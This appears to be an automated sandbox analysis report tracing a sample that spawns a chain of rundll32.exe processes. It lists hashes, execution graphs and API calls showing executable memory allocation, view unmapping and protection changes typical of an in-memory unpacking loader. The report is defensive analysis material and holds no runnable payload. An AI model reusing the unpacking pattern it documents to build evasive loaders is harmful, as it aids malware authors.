                                                                        0x1001c44d
                                                                        0x1001c451
                                                                        0x1001c459
                                                                        0x1001c461
                                                                        0x1001c466
                                                                        0x1001c46b
                                                                        0x1001c470
                                                                        0x1001c47d
                                                                        0x1001c481
                                                                        0x1001c48c
                                                                        0x1001c490
                                                                        0x1001c490
                                                                        0x1001c494
                                                                        0x1001c49c
                                                                        0x1001c4a1
                                                                        0x1001c4a6
                                                                        0x1001c4b3
                                                                        0x1001c4c0
                                                                        0x1001c4c2
                                                                        0x1001c4c6
                                                                        0x1001c4d6
                                                                        0x1001c4d9
                                                                        0x1001c4de
                                                                        0x1001c4e5
                                                                        0x1001c4e5
                                                                        0x1001c4e8
                                                                        0x1001c4ec
                                                                        0x1001c4ef
                                                                        0x1001c4f3
                                                                        0x1001c4f7
                                                                        0x1001c4fb
                                                                        0x1001c501
                                                                        0x1001c50a

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
                                                                        • Instruction ID: 5b25bb63792a61215608fa0d211dbb58c93cd0ca643869af53e15713821623f5
                                                                        • Opcode Fuzzy Hash: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
                                                                        • Instruction Fuzzy Hash: B521D0B25093469BD314CF22E55941BBBE5FBC47A4F11C82EF0949A250D3B9D9888FA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000CB42, Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
                                                                        • Instruction ID: 5e4aedc5437bb4b730e64eae390bb59a5c3d05a595a5c90b558fa43b463ff24e
                                                                        • Opcode Fuzzy Hash: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
                                                                        • Instruction Fuzzy Hash: 19212475D01209EBEF14DFE5C94A8DFBFB5EF44314F108189E514A6290D7B55A50CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D013, Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
                                                                        • Instruction ID: 20914b439a1a855b43ffabf6c900b342f87e07b14d6fa3fc41aad407bb02958c
                                                                        • Opcode Fuzzy Hash: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
                                                                        • Instruction Fuzzy Hash: 34218E71E00208FBEB08DFE5D94A9DEBBB6FB44310F10C099E514AB280D7B65B548F81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001D4D, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10001D4D() {

				return  *[fs:0x30];
			}



                                                                        0x10001d53

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: rundll32.exe PID: 2460 Parent PID: 2360 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1e08d0 1073 1e08ed 1072->1073 1078 1dff50 1073->1078 1075 1e097c 1081 1e0530 VirtualAlloc 1075->1081 1077 1e09b3 1079 1dff91 1078->1079 1080 1dffc4 VirtualAlloc 1079->1080 1080->1075 1082 1e058e 1081->1082 1083 1e0615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 1e0650 1083->1084 1085 1e077d 1084->1085 1086 1e0752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 1e0070 1088 1dff50 VirtualAlloc 1087->1088 1089 1e007d 1088->1089

                                                                        Executed Functions

                                                                        Function 001E0530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001E0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001E0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001E063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001E0770
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2124194003.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 7c315b2937cfc09b47359cd463c81ddf2159125a5a7695dbdfeaeb785a5cd8ca
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 32B198B4E00109DFCB48CF85C591AAEB7B5BF88304F248159E919AB345D775EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 001DFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 1dff50-1dff9b call 1e0360 42 1dff9d-1dffa7 call 1e0360 39->42 43 1dffaa-1dffda call 1dfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2124194003.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 7aa1de5240b737123d0b2ed92ef97064d34e08d3b664a1fd37bbf04b53327661
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 7B113060D082C9DEEB01D7E898097EFBFB55B21704F044098D6456A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2484 Parent PID: 2460 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1064 2408d0 1065 2408ed 1064->1065 1070 23ff50 1065->1070 1067 24097c 1073 240530 VirtualAlloc 1067->1073 1069 2409b3 1071 23ff91 1070->1071 1072 23ffc4 VirtualAlloc 1071->1072 1072->1067 1074 24058e 1073->1074 1075 240615 UnmapViewOfFile VirtualAlloc 1074->1075 1076 240650 1075->1076 1077 24077d 1076->1077 1078 240752 VirtualProtect 1076->1078 1077->1069 1078->1076 1079 240070 1080 23ff50 VirtualAlloc 1079->1080 1081 24007d 1080->1081

                                                                        Executed Functions

                                                                        Function 00240530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00240575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00240625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0024063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00240770
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2134000123.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_220000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 463ab6508aa1b196108f1a9b624d761ea300257e806ef0e29b2ae5e71564dc7e
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 30B198B4E001099FCB48CF84C591AAEB7B5FF88304F208159E919AB345D735EE92CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0023FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 23ff50-23ff9b call 240360 42 23ffaa-23ffda call 23fd30 VirtualAlloc 39->42 43 23ff9d-23ffa7 call 240360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0023FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2134000123.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_220000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 6a2b9d4180826b0c2c4727a06ef9a46f0f654430434d0575af91ef0fc3674807
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 381112A0D082CDDEEF01DBE8D4097EFBFB55F11704F044098D6456B282D6BA57588BB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2404 Parent PID: 2484 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 2108d0 1073 2108ed 1072->1073 1078 20ff50 1073->1078 1075 21097c 1081 210530 VirtualAlloc 1075->1081 1077 2109b3 1079 20ff91 1078->1079 1080 20ffc4 VirtualAlloc 1079->1080 1080->1075 1082 21058e 1081->1082 1083 210615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 210650 1083->1084 1085 21077d 1084->1085 1086 210752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 210070 1088 20ff50 VirtualAlloc 1087->1088 1089 21007d 1088->1089

                                                                        Executed Functions

                                                                        Function 00210530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00210625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2147803114.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0020FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 20ff50-20ff9b call 210360 42 20ffaa-20ffda call 20fd30 VirtualAlloc 39->42 43 20ff9d-20ffa7 call 210360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2147803114.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 3032 Parent PID: 2404 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1064 2308d0 1065 2308ed 1064->1065 1070 22ff50 1065->1070 1067 23097c 1073 230530 VirtualAlloc 1067->1073 1069 2309b3 1071 22ff91 1070->1071 1072 22ffc4 VirtualAlloc 1071->1072 1072->1067 1075 23058e 1073->1075 1074 230615 UnmapViewOfFile VirtualAlloc 1076 230650 1074->1076 1075->1074 1077 23077d 1076->1077 1078 230752 VirtualProtect 1076->1078 1077->1069 1078->1076 1079 230070 1080 22ff50 VirtualAlloc 1079->1080 1081 23007d 1080->1081

                                                                        Executed Functions

                                                                        Function 00230530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00230575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00230625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0023063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00230770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2157350672.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_210000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: adf6f3cc4832c56444c6b94731e8ac7bab03accd4048f4b6fbc70afd8c189439
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: DDB198B4E10109DFCB48CF84C591AAEB7B5BF88304F208159E919AB355D735EE92CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0022FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 22ff50-22ff9b call 230360 42 22ffaa-22ffda call 22fd30 VirtualAlloc 39->42 43 22ff9d-22ffa7 call 230360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0022FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2157350672.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_210000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 24cfe8d407d244fba926ef3a4865cb122934473a5ec65787b5f554f94fac5dcc
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 041130A0D0828DEEEB01D7E894497EFBFB55B11704F044098D6446A282D2BA57588BB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 3064 Parent PID: 3032 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1d08d0 1073 1d08ed 1072->1073 1078 1cff50 1073->1078 1075 1d097c 1081 1d0530 VirtualAlloc 1075->1081 1077 1d09b3 1079 1cff91 1078->1079 1080 1cffc4 VirtualAlloc 1079->1080 1080->1075 1082 1d058e 1081->1082 1083 1d0615 UnmapViewOfFile VirtualAlloc 1082->1083 1085 1d0650 1083->1085 1084 1d077d 1084->1077 1085->1084 1086 1d0752 VirtualProtect 1085->1086 1086->1085 1087 1d0070 1088 1cff50 VirtualAlloc 1087->1088 1089 1d007d 1088->1089

                                                                        Executed Functions

                                                                        Function 001D0530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001D0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001D0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001D063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001D0770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2168410050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 8c845bd7a9d44f48ecd72659dd369d635a91af7a0fff22964c4111745e888af5
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: FCB198B5E00109DFCB48CF84C591AAEB7B5BF88304F208159E919AB345D735EE82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 001CFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 1cff50-1cff9b call 1d0360 42 1cff9d-1cffa7 call 1d0360 39->42 43 1cffaa-1cffda call 1cfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2168410050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 900042fdf7f883baeb07b9f29496fca8e7a44ea98bbf02942e3e0086ac75ab76
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: A1113360D08289EEEB01D7E88409BEFBFB55B21704F044098D6456A282D3BA5759C7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 1616 Parent PID: 3064 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1908d0 1073 1908ed 1072->1073 1078 18ff50 1073->1078 1075 19097c 1081 190530 VirtualAlloc 1075->1081 1077 1909b3 1079 18ff91 1078->1079 1080 18ffc4 VirtualAlloc 1079->1080 1080->1075 1082 19058e 1081->1082 1083 190615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 190650 1083->1084 1085 19077d 1084->1085 1086 190752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 190070 1088 18ff50 VirtualAlloc 1087->1088 1089 19007d 1088->1089

                                                                        Executed Functions

                                                                        Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00190625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2177317496.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 18ff50-18ff9b call 190360 42 18ffaa-18ffda call 18fd30 VirtualAlloc 39->42 43 18ff9d-18ffa7 call 190360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2177317496.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2244 Parent PID: 1616 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1d08d0 1073 1d08ed 1072->1073 1078 1cff50 1073->1078 1075 1d097c 1081 1d0530 VirtualAlloc 1075->1081 1077 1d09b3 1079 1cff91 1078->1079 1080 1cffc4 VirtualAlloc 1079->1080 1080->1075 1082 1d058e 1081->1082 1083 1d0615 UnmapViewOfFile VirtualAlloc 1082->1083 1085 1d0650 1083->1085 1084 1d077d 1084->1077 1085->1084 1086 1d0752 VirtualProtect 1085->1086 1086->1085 1087 1d0070 1088 1cff50 VirtualAlloc 1087->1088 1089 1d007d 1088->1089

                                                                        Executed Functions

                                                                        Function 001D0530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

